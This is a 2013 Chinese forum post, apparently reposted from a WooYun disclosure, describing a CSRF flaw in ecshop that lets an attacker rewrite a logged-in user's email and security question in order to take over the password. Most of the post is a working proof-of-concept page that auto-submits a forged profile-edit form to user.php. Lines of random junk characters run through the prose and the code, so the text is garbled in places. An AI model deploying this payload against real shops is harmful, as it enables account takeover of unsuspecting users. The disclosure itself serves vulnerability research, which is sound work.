找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1910|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
" V+ d+ D$ P9 }) K0 G8 _ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
& q7 @4 [" o! X4 n+ n7 V( R& c9 h
Demo For:http://www.wooyun.org/bug.php?action=view&id=395
5 U. b# ^! W( f% S+ }+ G
8 R* R/ A( `8 k! w详细说明:
, D7 \0 S. m5 \4 G1 D* Q. D  |, y利用csrf和xss可以突破官方所说的“障碍”
0 x# ?+ k1 [) u" kxss版本已经有人说明
! B5 r1 E; J0 f这里给出csrf版本" Z9 _1 K" S2 c6 {( q

* |$ u8 a# L! x# _8 \漏洞证明:
  S/ W# ]. q* A<html>
: m& c  ?: m7 H# G1 a, F<body>
& W1 v: l5 A. e* ]<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
# @; l- V" G3 [1 s( c! z<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">$ I# ^4 @% g! m+ g# s* V
<INPUT TYPE="text" NAME="act" value="act_edit_profile">) g9 k5 p/ f5 ], q% Q! Y" T4 z6 Y
<INPUT TYPE="text" NAME="sel_question" value="ecshop">$ z" i' o4 A# q2 ^
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
/ Y+ x( H( A& ~</body>
: V8 E1 N- K# ?3 I: w1 s  w<script>
# x# r+ n* }6 H1 M/ idocument.forms[0].submit();
% b2 X) e; u" S, T  i2 y# ?</script>
8 W- L9 F8 E( A9 f  f( w. R4 B</html>3 o8 K8 P( ~7 V( v2 Y$ a
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失5 m7 X* u$ N& V; |" U. s' C
" e" p+ U, ?3 B1 C: K1 |
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表